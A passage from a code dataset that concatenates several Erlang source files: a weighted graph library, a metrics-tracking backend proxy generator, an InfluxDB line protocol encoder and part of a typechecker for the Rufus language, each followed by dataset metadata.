add_edge(#graph{type=directed, graph=G}, From, To, W) when is_number(W) ->
digraph:add_edge(G, {From, To}, From, To, W);
add_edge(#graph{type=undirected, graph=G}, From, To, W) when is_number(W) ->
digraph:add_edge(G, {From, To}, From, To, W),
digraph:add_edge(G, {To, From}, To, From, W);
add_edge(_G, _From, _To, _W) ->
{error, not_numeric_weight}.
%% @doc Delete an edge from a graph
-spec del_edge(graph(), edge()) -> 'true'.
del_edge(#graph{type=directed} = G, E) ->
digraph:del_edge(G#graph.graph, E);
del_edge(#graph{type=undirected} = G, {From, To}) ->
digraph:del_edge(G#graph.graph, {From, To}),
digraph:del_edge(G#graph.graph, {To, From}).
%% @doc Return a list of the edges of a graph
-spec edges(graph()) -> [edge()].
edges(G) ->
Es = digraph:edges(G#graph.graph),
case G#graph.type of
directed -> Es;
undirected -> remove_duplicate_edges(Es, [])
end.
%% Remove the duplicate edges of a undirected graph
remove_duplicate_edges([], Acc) ->
Acc;
remove_duplicate_edges([{From, To}=E|Es], Acc) ->
remove_duplicate_edges(Es -- [{To, From}], [E|Acc]).
%% @doc Return the number of edges in a graph
-spec num_of_edges(graph()) -> non_neg_integer().
num_of_edges(G) ->
M = digraph:no_edges(G#graph.graph),
case G#graph.type of
directed -> M;
undirected -> M div 2
end.
%% @doc Return the weight of an edge
-spec edge_weight(graph(), edge()) -> weight() | 'false'.
edge_weight(G, E) ->
case digraph:edge(G#graph.graph, E) of
{E, _V1, _V2, W} -> W;
false -> false
end.
%% @doc Return a list of the edges of a graph along with their weights
-spec edges_with_weights(graph()) -> [{edge(), weight()}].
edges_with_weights(G) ->
Es = edges(G),
lists:map(fun(E) -> {E, edge_weight(G, E)} end, Es).
%% @doc Return a list of the out neighbours of a vertex
-spec out_neighbours(graph(), vertex()) -> [vertex()].
out_neighbours(G, V) ->
digraph:out_neighbours(G#graph.graph, V).
%% @doc Return the degree of a vertex
-spec degree(graph(),vertex())->non_neg_integer().
degree(#graph{graph = G,type = undirected},V)->
digraph:out_degree(G,V); %could be in or out degree
degree(#graph{graph = G,type = directed},V)->
digraph:out_degree(G,V)+digraph:in_degree(G,V).
%% @doc Check if underlying graph is a tree
%%
%% This is a wrapper for digraph:is_tree()
is_tree(#graph{graph = G,type = undirected}) ->
((digraph:no_edges(G) div 2) =:= digraph:no_vertices(G) - 1)
andalso (length(digraph_utils:components(G)) =:= 1);
is_tree(#graph{graph = G}) ->
digraph_utils:is_tree(G).
%% @doc Returns a list of vertices that are part of cycle.
%%
%% In undirected graph, even if there are no cycles present,
%% digraph:get_cycle would return a list of
%% 3 vertices with first and last one being the same as requested
%% vertex. This does not represent a cycle.
-spec get_cycle(graph(), vertex()) -> [vertex()].
get_cycle(#graph{graph = G,type = undirected},V)->
case one_path(digraph:out_neighbours(G, V), V, [], [V], [V], 3, G, 1) of
false ->
case lists:member(V, digraph:out_neighbours(G, V)) of
true -> [V];
false -> false
end;
[V,_,V] ->
false;
Vs ->
Vs
end;
get_cycle(#graph{graph = G,type = directed},V)->
digraph:get_cycle(G,V).
%% @doc Helper functions to support get_cycle
%%
%% Following code is copy-paste from digraph source code, except for the place
%% where one_path is called with Prune parameter of 3 for undirected graphs. This
%% code is internal to digraph module.
%% prune_short_path (evaluate conditions on path)
%% short : if path is too short
%% ok : if path is ok
%%
prune_short_path(Counter, Min) when Counter < Min ->
short;
prune_short_path(_Counter, _Min) ->
ok.
one_path([W|Ws], W, Cont, Xs, Ps, Prune, G, Counter) ->
case prune_short_path(Counter, Prune) of
short -> one_path(Ws, W, Cont, Xs, Ps, Prune, G, Counter);
ok -> lists:reverse([W|Ps])
end;
one_path([V|Vs], W, Cont, Xs, Ps, Prune, G, Counter) ->
case lists:member(V, Xs) of
true -> one_path(Vs, W, Cont, Xs, Ps, Prune, G, Counter);
false -> one_path(digraph:out_neighbours(G, V), W,
[{Vs,Ps} | Cont], [V|Xs], [V|Ps],
Prune, G, Counter+1)
end;
one_path([], W, [{Vs,Ps}|Cont], Xs, _, Prune, G, Counter) ->
one_path(Vs, W, Cont, Xs, Ps, Prune, G, Counter-1);
one_path([], _, [], _, _, _, _, _Counter) -> false.
%% @doc Pretty print a graph
-spec pprint(Graph) -> ok when
Graph :: graph() | digraph:graph().
pprint(G) ->
io:format("~s", [graph2text(G)]).
%% @doc Graph to text form. Can be used in log messages
-spec graph2text(Graph) -> list() when
Graph :: graph() | digraph:graph().
graph2text(G) when is_record(G, graph) ->
graph2text(G#graph.graph);
graph2text(D) ->
Vs = digraph:vertices(D),
F =
fun(V) ->
Es = digraph:out_edges(D, V),
Ns = lists:map(
fun(E) ->
{E, _V1, V2, W} = digraph:edge(D, E),
{V2, W}
end,
Es),
{V, Ns}
end,
N = lists:sort(fun erlang:'<'/2, lists:map(F, Vs)),
lists:flatten(
io_lib:format("[{From, [{To, Weight}]}]~n", []) ++
io_lib:format("========================~n", []) ++
io_lib:format("~p~n", [N])
).
%% @doc Exports a graph to a file.
%% <p>The user must provide the function that will generate the textual
%% representation of a vertex.</p>
%%
%% <p>DumpVertex will take a vertex and return its textual representation.</p>
-spec export(graph(), file:name(), fun((vertex()) -> string())) -> ok.
export(Graph, Filename, DumpVertex) ->
{ok, IO} = file:open(Filename, [write]),
export_graph_info(IO, Graph),
export_vertices(IO, Graph, DumpVertex),
export_edges(IO, Graph, DumpVertex),
file:close(IO).
export_graph_info(IO, Graph) ->
N = num_of_vertices(Graph),
M = num_of_edges(Graph),
GT = graph_type(Graph),
WT = weight_type(Graph),
io:fwrite(IO, "~w ~w ~w ~w~n", [N, M, GT, WT]).
export_vertices(IO, Graph, DumpVertex) ->
Vs = vertices(Graph),
Rs = [io_lib:format("~s", [DumpVertex(V)]) || V <- Vs],
io:fwrite(IO, "~s~n", [string:join(Rs, " ")]).
export_edges(IO, Graph, DumpVertex) ->
Es = edges(Graph),
lists:foreach(
fun({V1, V2}=E) ->
W = edge_weight(Graph, E),
io:fwrite(IO, "~s ~s ~w~n", [DumpVertex(V1), DumpVertex(V2), W])
end,
Es).
%% @doc Imports an exported graph.
%% <p>The user must provide the function that will parse the textual
%% representation of a vertex.</p>
%%
%% <p>MapVertex will take the textual representation of a vertex and return
%% the actual vertex.</p>
-spec import(file:name(), fun((string()) -> vertex())) -> graph().
import(File, MapVertex) ->
ImportVs = fun(IO, _N) -> import_vertices(IO, MapVertex) end,
ImportEs = fun(IO, WT) -> read_edge(IO, WT, MapVertex) end,
from_file(File, ImportVs, ImportEs).
import_vertices(IO, MapVertex) ->
Line = io:get_line(IO, ""),
Strip1 = string:strip(Line, right, $\n),
Strip2 = string:strip(Strip1, right, $\n),
Vs = string:tokens(Strip2, " "),
[MapVertex(V) || V <- Vs].
%% @doc Checks if two graphs are equal.
-spec equal(graph(), graph()) -> boolean().
equal(G1, G2) ->
graph_type(G1) =:= graph_type(G2)
andalso weight_type(G1) =:= weight_type(G2)
andalso num_of_vertices(G1) =:= num_of_vertices(G2)
andalso num_of_edges(G1) =:= num_of_edges(G2)
andalso lists:sort(vertices(G1)) =:= lists:sort(vertices(G2))
andalso equal_edges(G1, G2).
equal_edges(G1, G2) ->
Es1 = lists:sort(edges(G1)),
Es2 = lists:sort(edges(G2)),
case Es1 =:= Es2 of
false -> false;
true ->
[edge_weight(G1, E) || E <- Es1] =:= [edge_weight(G2, E) || E <- Es2]
end. | src/graph.erl | 0.684897 | 0.67682 | graph.erl | starcoder |
%%%-------------------------------------------------------------------
%%% @author yangcancai
%%% Copyright (c) 2021 by yangcancai(<EMAIL>), All Rights Reserved.
%%%
%%% Licensed under the Apache License, Version 2.0 (the "License");
%%% you may not use this file except in compliance with the License.
%%% You may obtain a copy of the License at
%%%
%%% https://www.apache.org/licenses/LICENSE-2.0
%%%
%%% Unless required by applicable law or agreed to in writing, software
%%% distributed under the License is distributed on an "AS IS" BASIS,
%%% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
%%% See the License for the specific language governing permissions and
%%% limitations under the License.
%%%
%%% @doc
%%%
%%% @end
%%% Created : 2021-09-08T09:25:12+00:00
%%%-------------------------------------------------------------------
-module(cool_tools_backend).
-author("yangcancai").
-export([create/2, create/3]).
-export([backend_module/2]).
%% Callback implemented by proxy modules.
-callback backend() -> module().
%% API
-spec create(For :: module(), Name :: atom()) -> {ok, module()} | {error, already_loaded}.
create(For, Name) ->
create(For, Name, []).
-spec create(For :: module(), Name :: atom(), TrackedFuns :: [atom()]) ->
{ok, module()} | {error, already_loaded}.
create(Module, Backend, TrackedFuns) ->
ProxyModule = proxy_module(Module),
BackendModule = backend_module(Module, Backend),
ensure_backend_metrics(Module, TrackedFuns),
case catch ProxyModule:backend() of
BackendModule ->
{error, already_loaded};
_ ->
{ProxyModuleStr, CodeString} = backend_code(Module, Backend, TrackedFuns),
{Mod, Code} = cool_tools_compile:from_string(CodeString),
code:load_binary(Mod, ProxyModuleStr ++ ".erl", Code),
{ok, ProxyModule}
end.
%% Internal functions
-spec proxy_module(Module :: module()) -> module().
proxy_module(Module) ->
list_to_atom(atom_to_list(Module) ++ "_backend").
-spec backend_module(Module :: module(), Backend :: atom()) -> module().
backend_module(Module, Backend) ->
list_to_atom(atom_to_list(Module) ++ "_" ++ atom_to_list(Backend)).
-spec backend_code(module(), atom(), list()) -> {nonempty_string(), list()}.
backend_code(Module, Backend, TrackedFuns) when is_atom(Backend) ->
Callbacks = Module:behaviour_info(callbacks),
ModuleStr = atom_to_list(Module),
ProxyModuleName = ModuleStr ++ "_backend",
RealBackendModule = ModuleStr ++ "_" ++ atom_to_list(Backend),
BehaviourExports = [generate_export(F, A) || {F, A} <- Callbacks],
BehaviourImpl =
[generate_fun(Module, RealBackendModule, F, A, TrackedFuns) || {F, A} <- Callbacks],
Code =
lists:flatten(["-module(",
ProxyModuleName,
").\n",
"-behaviour(backend_module).\n-export([backend/0, backend_name/0]).\n",
BehaviourExports,
"-spec backend() -> atom().\n",
"backend() ->",
RealBackendModule,
".\n",
"backend_name() ->",
atom_to_list(Backend),
".\n",
BehaviourImpl]),
{ProxyModuleName, Code}.
generate_export(F, A) ->
"-export([" ++ atom_to_list(F) ++ "/" ++ integer_to_list(A) ++ "]).\n".
generate_fun(BaseModule, RealBackendModule, F, A, TrackedFuns) ->
Args = string:join(["A" ++ integer_to_list(I) || I <- lists:seq(1, A)], ", "),
IsTracked = lists:member(F, TrackedFuns),
[fun_header(F, Args),
" ->\n",
generate_fun_body(IsTracked, BaseModule, RealBackendModule, F, Args)].
fun_header(F, Args) ->
[atom_to_list(F), "(", Args, ")"].
time_metric(Module, Op) ->
[backends, Module, Op].
calls_metric(Module, Op) ->
[backends, Module, calls, Op].
generate_fun_body(false, _, RealBackendModule, F, Args) ->
[" ", RealBackendModule, ":", fun_header(F, Args), ".\n"];
generate_fun_body(true, BaseModule, RealBackendModule, F, Args) ->
FS = atom_to_list(F),
%% returned is the following
%% cool_tools_metrics:update(global, calls_metric(Backend, F), 1),
%% {Time, Result} = timer:tc(Backend, F, Args),
%% cool_tools_metrics:update(global, time_metric(Backend, F), Time),
%% Result.
CallsMetric = io_lib:format("~p", [calls_metric(BaseModule, F)]),
TimeMetric = io_lib:format("~p", [time_metric(BaseModule, F)]),
[" cool_tools_metrics:update(global, ",
CallsMetric,
", 1), \n",
" {Time, Result} = timer:tc(",
RealBackendModule,
", ",
FS,
", [",
Args,
"]), \n",
" cool_tools_metrics:update(global, ",
TimeMetric,
", Time), \n",
" Result.\n"].
ensure_backend_metrics(Module, Ops) ->
EnsureFun =
fun(Op) ->
cool_tools_metrics:ensure_metric(global, calls_metric(Module, Op), spiral),
cool_tools_metrics:ensure_metric(global, time_metric(Module, Op), histogram)
end,
lists:foreach(EnsureFun, Ops). | src/cool_tools_backend.erl | 0.582491 | 0.460653 | cool_tools_backend.erl | starcoder |
%% Copyright (c) 2020-2021 <NAME> <<EMAIL>>.
%%
%% Permission to use, copy, modify, and/or distribute this software for any
%% purpose with or without fee is hereby granted, provided that the above
%% copyright notice and this permission notice appear in all copies.
%%
%% THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
%% WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
%% MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY
%% SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
%% WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
%% ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR
%% IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
-module(influx_line_protocol).
-export([encode_point/1, encode_points/1,
encode_measurement/1,
encode_fields/1, encode_field/2, encode_field_value/1,
encode_tags/1, encode_tag/2, encode_key/1,
encode_string/1,
encode_timestamp/1]).
-spec encode_point(influx:point()) -> iodata().
encode_point(Point) ->
Measurement = maps:get(measurement, Point),
Fields = maps:get(fields, Point),
TagsData = case maps:find(tags, Point) of
{ok, Tags} when map_size(Tags) > 0 ->
[$,, encode_tags(Tags)];
_ ->
[]
end,
TimestampData = case maps:find(timestamp, Point) of
{ok, Value} ->
[$ , encode_timestamp(Value)];
error ->
[]
end,
[encode_measurement(Measurement),
TagsData,
$ , encode_fields(Fields),
TimestampData].
-spec encode_points([influx:point()]) -> iodata().
encode_points(Points) ->
[[influx_line_protocol:encode_point(Point), $\n] || Point <- Points].
-spec encode_measurement(influx:key()) -> binary().
encode_measurement(Measurement) when is_atom(Measurement) ->
encode_measurement(atom_to_binary(Measurement), <<>>);
encode_measurement(Measurement) ->
encode_measurement(unicode:characters_to_binary(Measurement), <<>>).
encode_measurement(<<>>, Acc) ->
Acc;
encode_measurement(<<Char, Rest/binary>>, Acc) ->
case Char of
C when C == $,; C == $=; C == $ ->
encode_measurement(Rest, <<Acc/binary, $\\, C>>);
C ->
encode_measurement(Rest, <<Acc/binary, C>>)
end.
-spec encode_fields(influx:fields()) -> iodata().
encode_fields(Fields) when map_size(Fields) == 0 ->
error(empty_fields);
encode_fields(Fields) ->
Entries = lists:sort(fun ({K1, _}, {K2, _}) ->
K1 =< K2
end, maps:to_list(Fields)),
Data = lists:map(fun ({K, V}) -> encode_field(K, V) end, Entries),
lists:join($,, Data).
-spec encode_field(influx:key(), influx:field_value()) -> iodata().
encode_field(Name, Value) ->
[encode_key(Name), $=, encode_field_value(Value)].
-spec encode_field_value(influx:field_value()) -> iodata().
encode_field_value(V) when is_float(V) ->
io_lib_format:fwrite_g(V);
encode_field_value(V) when is_integer(V) ->
[integer_to_binary(V), $i];
encode_field_value(true) ->
<<"true">>;
encode_field_value(false) ->
<<"false">>;
encode_field_value(V) when is_binary(V) ->
encode_string(V).
-spec encode_tags(influx:tags()) -> iodata().
encode_tags(Tags) ->
Entries = lists:sort(fun ({K1, _}, {K2, _}) ->
K1 =< K2
end, maps:to_list(Tags)),
Data = lists:map(fun ({K, V}) -> encode_tag(K, V) end, Entries),
lists:join($,, Data).
-spec encode_tag(influx:key(), influx:key()) -> iodata().
encode_tag(Name, Value) ->
[encode_key(Name), $=, encode_key(Value)].
-spec encode_key(influx:key()) -> binary().
encode_key(Key) when is_atom(Key) ->
encode_key(atom_to_binary(Key), <<>>);
encode_key(Key) ->
encode_key(unicode:characters_to_binary(Key), <<>>).
encode_key(<<>>, Acc) ->
Acc;
encode_key(<<Char, Rest/binary>>, Acc) ->
case Char of
C when C == $,; C == $=; C == $ ->
encode_key(Rest, <<Acc/binary, $\\, C>>);
C ->
encode_key(Rest, <<Acc/binary, C>>)
end.
-spec encode_string(binary()) -> iodata().
encode_string(Bin) ->
encode_string(Bin, <<>>).
encode_string(<<>>, Acc) ->
[$", Acc, $"];
encode_string(<<$", Rest/binary>>, Acc) ->
encode_string(Rest, <<Acc/binary, $\\, $">>);
encode_string(<<$\\, Rest/binary>>, Acc) ->
encode_string(Rest, <<Acc/binary, $\\, $\\>>);
encode_string(<<C, Rest/binary>>, Acc) ->
encode_string(Rest, <<Acc/binary, C>>).
-spec encode_timestamp(influx:timestamp()) -> iodata().
encode_timestamp(Value) ->
integer_to_binary(Value). | src/influx_line_protocol.erl | 0.528777 | 0.628151 | influx_line_protocol.erl | starcoder |
%% rufus_expr annotates forms with type information and performs typechecks to
%% ensure correctness.
-module(rufus_expr).
-include_lib("rufus_type.hrl").
%% API exports
-export([typecheck_and_annotate/1]).
%% API
%% typecheck_and_annotate iterates over RufusForms and adds type information
%% from the current scope to each form. Iteration stops at the first error.
%% Return values:
%% - `{ok, AnnotatedForms}` if no issues are found.
%% - `{error, unknown_func, Data}` with `Data` containing a `spec` key that has
%% the function name.
%% - `{error, incorrect_arg_count, Data}` with `Data` containing `actual` and
%% `expected` atom keys pointing to the number of args received and the number
%% of args expected, respectively
%% - `{error, invalid_arg_type, Data}` with `Data` containing `actual` and
%% `expected` atom keys pointing to Rufus types if return value types are
%% unmatched.
-spec typecheck_and_annotate(rufus_forms()) -> {ok, rufus_forms()} | error_triple().
typecheck_and_annotate(RufusForms) ->
Acc = [],
Stack = [],
Locals = #{},
try
{ok, Globals, AnnotatedForms1} = typecheck_and_annotate_globals(Acc, Stack, RufusForms),
{ok, _Locals, AnnotatedForms2} = typecheck_and_annotate(
Acc,
Stack,
Globals,
Locals,
AnnotatedForms1
),
ok = rufus_forms:each(AnnotatedForms2, fun safety_check/1),
{ok, AnnotatedForms2}
catch
{error, Code, Data} ->
{error, Code, Data}
end.
%% Private API
%% safety_check ensures that every form has type information. An `{error,
%% safety_check, Data}` error triple is thrown if a form doesn't have type
%% information, otherwise `ok` is returned.
-spec safety_check(rufus_form()) -> ok | no_return().
safety_check({func, _Context}) ->
ok;
safety_check({module, _Context}) ->
ok;
safety_check({_FormType, #{type := _Type}}) ->
ok;
safety_check(Form) ->
Data = #{
form => Form,
error => missing_type_information
},
throw({error, safety_check, Data}).
%% typecheck_and_annotate_globals iterates over RufusForms and adds type
%% information to all module-level functions. An `{error, Reason, Data}` error
%% triple is thrown at the first error.
-spec typecheck_and_annotate_globals(rufus_forms(), rufus_stack(), rufus_forms()) ->
{ok, globals(), rufus_forms()}.
typecheck_and_annotate_globals(Acc, Stack, [Form = {func, _Context} | T]) ->
{ok, AnnotatedForm} = typecheck_and_annotate_func_params(Stack, Form),
typecheck_and_annotate_globals([AnnotatedForm | Acc], Stack, T);
typecheck_and_annotate_globals(Acc, Stack, [Form = {module, _Context} | T]) ->
typecheck_and_annotate_globals([Form | Acc], Stack, T);
typecheck_and_annotate_globals(Acc, _Stack, []) ->
Forms = lists:reverse(Acc),
{ok, Globals} = rufus_forms:globals(Forms),
{ok, Globals, Forms}.
%% typecheck_and_annotate iterates over RufusForms and adds type information
%% from the current scope to each form. An `{error, Reason, Data}` error triple
%% is thrown at the first error.
-spec typecheck_and_annotate(rufus_forms(), rufus_stack(), globals(), locals(), rufus_forms()) ->
{ok, locals(), rufus_forms()}.
typecheck_and_annotate(Acc, Stack, Globals, Locals, [Form = {binary_op, _Context} | T]) ->
{ok, AnnotatedForm} = typecheck_and_annotate_binary_op(Stack, Globals, Locals, Form),
typecheck_and_annotate([AnnotatedForm | Acc], Stack, Globals, Locals, T);
typecheck_and_annotate(Acc, Stack, Globals, Locals, [Form = {call, _Context} | T]) ->
{ok, AnnotatedForm} = typecheck_and_annotate_call(Stack, Globals, Locals, Form),
typecheck_and_annotate([AnnotatedForm | Acc], Stack, Globals, Locals, T);
typecheck_and_annotate(Acc, Stack, Globals, Locals, [Form = {'case', _Context} | T]) ->
{ok, AnnotatedForm} = typecheck_and_annotate_case(Stack, Globals, Locals, Form),
typecheck_and_annotate([AnnotatedForm | Acc], Stack, Globals, Locals, T);
typecheck_and_annotate(Acc, Stack, Globals, Locals, [Form = {case_clause, _Context} | T]) ->
{ok, AnnotatedForm} = typecheck_and_annotate_case_clause(Stack, Globals, Locals, Form),
typecheck_and_annotate([AnnotatedForm | Acc], Stack, Globals, Locals, T);
typecheck_and_annotate(Acc, Stack, Globals, Locals, [Form = {catch_clause, _Context} | T]) ->
{ok, AnnotatedForm} = typecheck_and_annotate_catch_clause(Stack, Globals, Locals, Form),
typecheck_and_annotate([AnnotatedForm | Acc], Stack, Globals, Locals, T);
typecheck_and_annotate(Acc, Stack, Globals, Locals, [Form = {cons, _Context} | T]) ->
{ok, NewLocals, AnnotatedForm} = typecheck_and_annotate_cons(Stack, Globals, Locals, Form),
typecheck_and_annotate([AnnotatedForm | Acc], Stack, Globals, NewLocals, T);
typecheck_and_annotate(Acc, Stack, Globals, Locals, [Form = {func, _Context} | T]) ->
{ok, AnnotatedForm} = typecheck_and_annotate_func(Stack, Globals, Locals, Form),
typecheck_and_annotate([AnnotatedForm | Acc], Stack, Globals, Locals, T);
typecheck_and_annotate(Acc, Stack, Globals, Locals, [Form = {identifier, _Context} | T]) ->
{ok, NewLocals, AnnotatedForm} = typecheck_and_annotate_identifier(
Stack,
Globals,
Locals,
Form
),
typecheck_and_annotate([AnnotatedForm | Acc], Stack, Globals, NewLocals, T);
typecheck_and_annotate(Acc, Stack, Globals, Locals, [Form = {list_lit, _Context} | T]) ->
{ok, NewLocals, AnnotatedForm} = typecheck_and_annotate_list_lit(Stack, Globals, Locals, Form),
typecheck_and_annotate([AnnotatedForm | Acc], Stack, Globals, NewLocals, T);
typecheck_and_annotate(Acc, Stack, Globals, Locals, [Form = {match_op, _Context} | T]) ->
{ok, NewLocals, AnnotatedForm} = typecheck_and_annotate_match_op(Stack, Globals, Locals, Form),
typecheck_and_annotate([AnnotatedForm | Acc], Stack, Globals, NewLocals, T);
typecheck_and_annotate(Acc, Stack, Globals, Locals, [Form = {param, _Context} | T]) ->
{ok, NewLocals} = push_local(Locals, Form),
typecheck_and_annotate([Form | Acc], Stack, Globals, NewLocals, T);
typecheck_and_annotate(Acc, Stack, Globals, Locals, [Form = {throw, _Context} | T]) ->
{ok, NewLocals, AnnotatedForm} = typecheck_and_annotate_throw(Stack, Globals, Locals, Form),
typecheck_and_annotate([AnnotatedForm | Acc], Stack, Globals, NewLocals, T);
typecheck_and_annotate(Acc, Stack, Globals, Locals, [Form = {try_catch_after, _Context} | T]) ->
{ok, NewLocals, AnnotatedForm} = typecheck_and_annotate_try_catch_after(
Stack,
Globals,
Locals,
Form
),
typecheck_and_annotate([AnnotatedForm | Acc], Stack, Globals, NewLocals, T);
typecheck_and_annotate(Acc, Stack, Globals, Locals, [H | T]) ->
typecheck_and_annotate([H | Acc], Stack, Globals, Locals, T);
typecheck_and_annotate(Acc, _Stack, _Globals, Locals, []) ->
{ok, Locals, lists:reverse(Acc)}.
%% binary_op form helpers
%% typecheck_and_annotate_binary_op ensures that binary_op operands are
%% exclusively ints or exclusively floats. Inferred type information is added to
%% every `binary_op` form. Return values:
%% - `{ok, AnnotatedForms}` if no issues are found. Every `binary_op` form is
%% annotated with type information.
%% - `{error, unmatched_operand_type, Form}` is thrown if an `int` operand is
%% mixed with a `float` operand. `Form` contains the illegal operands.
%% - `{error, unsupported_operand_type, Form}` is thrown if a type other than an
%% int is used as an operand. `Form` contains the illegal operands.
-spec typecheck_and_annotate_binary_op(rufus_stack(), globals(), locals(), binary_op_form()) ->
{ok, binary_op_form()} | no_return().
typecheck_and_annotate_binary_op(
Stack,
Globals,
Locals,
Form = {binary_op, Context = #{left := Left, right := Right}}
) ->
BinaryOpStack = [Form | Stack],
LeftStack = [rufus_form:make_binary_op_left(Form) | BinaryOpStack],
{ok, Locals, [AnnotatedLeft]} = typecheck_and_annotate([], LeftStack, Globals, Locals, [Left]),
RightStack = [rufus_form:make_binary_op_right(Form) | BinaryOpStack],
{ok, Locals, [AnnotatedRight]} = typecheck_and_annotate([], RightStack, Globals, Locals, [Right]),
Context1 = Context#{left => AnnotatedLeft, right => AnnotatedRight},
AnnotatedForm1 = {binary_op, Context1#{locals => Locals}},
case rufus_type:resolve(Globals, AnnotatedForm1) of
{ok, TypeForm} ->
AnnotatedForm2 = {binary_op, Context1#{type => TypeForm}},
{ok, AnnotatedForm2};
Error ->
throw(Error)
end.
%% call form helpers
%% typecheck_and_annotate_call resolves the return type for a function call and
%% returns a call form annotated with type information.
-spec typecheck_and_annotate_call(rufus_stack(), globals(), locals(), call_form()) ->
{ok, call_form()} | no_return().
typecheck_and_annotate_call(
Stack,
Globals,
Locals,
{call, Context = #{args := Args, spec := Spec}}
) ->
{ok, _NewLocals, AnnotatedArgs} = typecheck_and_annotate([], Stack, Globals, Locals, Args),
Context1 = Context#{args => AnnotatedArgs},
Context2 =
case maps:get(Spec, Locals, undefined) of
undefined ->
Context1;
[_Type] ->
%% The identifier being invoked refers to a function defined in
%% the local scope, which means it must be an anonymous
%% function. We mark the form so that rufus_erlang:forms/1 can
%% generate the correct Erlang abstract syntax to match the use
%% case of calling a named function vs. an anonymous function.
Context1#{kind => anonymous}
end,
Form = {call, Context2#{locals => Locals}},
case rufus_type:resolve(Globals, Form) of
{ok, TypeForm} ->
AnnotatedForm = {call, Context2#{type => TypeForm}},
{ok, AnnotatedForm};
Error ->
throw(Error)
end.
%% case form helpers
%% TODO(jkakar) Figure out why Dialyzer doesn't like this spec:
%% -spec typecheck_and_annotate_case(rufus_stack(), globals(), locals(), case_form()) ->
%% {ok, locals(), case_form()} | no_return().
typecheck_and_annotate_case(
Stack,
Globals,
Locals,
{'case', Context = #{match_expr := MatchExpr, clauses := Clauses}}
) ->
{ok, NewLocals, [AnnotatedMatchExpr]} = typecheck_and_annotate(
[],
Stack,
Globals,
Locals,
[MatchExpr]
),
AnnotatedForm1 = {'case', Context#{match_expr => AnnotatedMatchExpr}},
CaseStack = [AnnotatedForm1 | Stack],
{ok, _, AnnotatedClauses} = typecheck_and_annotate(
[], CaseStack, Globals, NewLocals, Clauses
),
ok = typecheck_case_clause_return_types(AnnotatedClauses),
AnnotatedForm2 =
{'case', Context#{
match_expr => AnnotatedMatchExpr,
clauses => AnnotatedClauses
}},
case rufus_type:resolve(Stack, Globals, AnnotatedForm2) of
{ok, TypeForm} ->
AnnotatedForm3 =
{'case', Context#{
match_expr => AnnotatedMatchExpr,
clauses => AnnotatedClauses,
type => TypeForm
}},
{ok, AnnotatedForm3};
Error ->
throw(Error)
end.
-spec typecheck_and_annotate_case_clause(
rufus_stack(),
globals(),
locals(),
case_clause_form()
) -> {ok, case_clause_form()} | no_return().
typecheck_and_annotate_case_clause(
Stack,
Globals,
Locals,
Form = {case_clause, Context = #{match_expr := MatchExpr, exprs := Exprs}}
) ->
CaseClauseStack = [Form | Stack],
{ok, NewLocals, [AnnotatedMatchExpr]} = typecheck_and_annotate(
[],
CaseClauseStack,
Globals,
Locals,
[MatchExpr]
),
ok = typecheck_case_clause_match_expr(Stack, AnnotatedMatchExpr),
{ok, _, AnnotatedExprs} = typecheck_and_annotate([], Stack, Globals, NewLocals, Exprs),
AnnotatedForm1 =
{case_clause, Context#{
match_expr => AnnotatedMatchExpr,
exprs => AnnotatedExprs
}},
case rufus_type:resolve(Stack, Globals, AnnotatedForm1) of
{ok, TypeForm} ->
AnnotatedForm2 =
{case_clause, Context#{
match_expr => AnnotatedMatchExpr,
exprs => AnnotatedExprs,
type => TypeForm
}},
{ok, AnnotatedForm2};
Error ->
throw(Error)
end;
typecheck_and_annotate_case_clause(
Stack,
Globals,
Locals,
{case_clause, Context = #{exprs := Exprs}}
) ->
{ok, _, AnnotatedExprs} = typecheck_and_annotate([], Stack, Globals, Locals, Exprs),
AnnotatedForm1 =
{case_clause, Context#{
exprs => AnnotatedExprs
}},
case rufus_type:resolve(Stack, Globals, AnnotatedForm1) of
{ok, TypeForm} ->
AnnotatedForm2 =
{case_clause, Context#{
exprs => AnnotatedExprs,
type => TypeForm
}},
{ok, AnnotatedForm2};
Error ->
throw(Error)
end.
%% typecheck_case_clause_match_expr ensures that the match expression is
%% compatible with the case value type.
-spec typecheck_case_clause_match_expr(rufus_stack(), rufus_form()) -> ok | no_return().
typecheck_case_clause_match_expr(
Stack = [{'case', #{match_expr := CaseMatchExpr}} | _T], MatchExpr
) ->
case {rufus_form:type_spec(CaseMatchExpr), rufus_form:type_spec(MatchExpr)} of
{T, T} ->
ok;
{Expected, Actual} ->
Data = #{
stack => Stack,
match_expr => MatchExpr,
actual => Actual,
expected => Expected
},
throw({error, unmatched_case_clause_type, Data})
end.
%% typecheck_case_clause_return_types ensures that the try block and all case
%% clause blocks have the same return type.
-spec typecheck_case_clause_return_types(list(case_clause_form())) -> ok | no_return().
typecheck_case_clause_return_types(CaseClauses) ->
CaseClauseTypeForms = lists:map(
fun(CaseClauseForm) -> {CaseClauseForm, rufus_form:type(CaseClauseForm)} end,
CaseClauses
),
FormPairs = lists:foldr(
fun(Element, Acc) ->
case Element of
{_Form, {type, #{kind := throw}}} -> Acc;
_ -> [Element | Acc]
end
end,
[],
CaseClauseTypeForms
),
validate_case_clause_return_type([], FormPairs).
%% validate_case_clause_return_type iterates over {Form, TypeForm} 2-tuples and
%% returns ok if the types for pairs match, or throws an {error,
%% mismatched_case_clause_return_type, Data} 3-tuple.
%% -spec validate_case_clause_return_type(list(atom), list({rufus_form(), type_form()})) ->
%% ok | no_return.
validate_case_clause_return_type([Spec], [{_Form, {type, #{spec := Spec}}} | T]) ->
validate_case_clause_return_type([Spec], T);
validate_case_clause_return_type([], [{_Form, {type, #{spec := Spec}}} | T]) ->
validate_case_clause_return_type([Spec], T);
validate_case_clause_return_type([ExpectedSpec], [{Form, {type, #{spec := ActualSpec}}} | _T]) ->
Data = #{
form => Form,
actual => ActualSpec,
expected => ExpectedSpec
},
throw({error, mismatched_case_clause_return_type, Data});
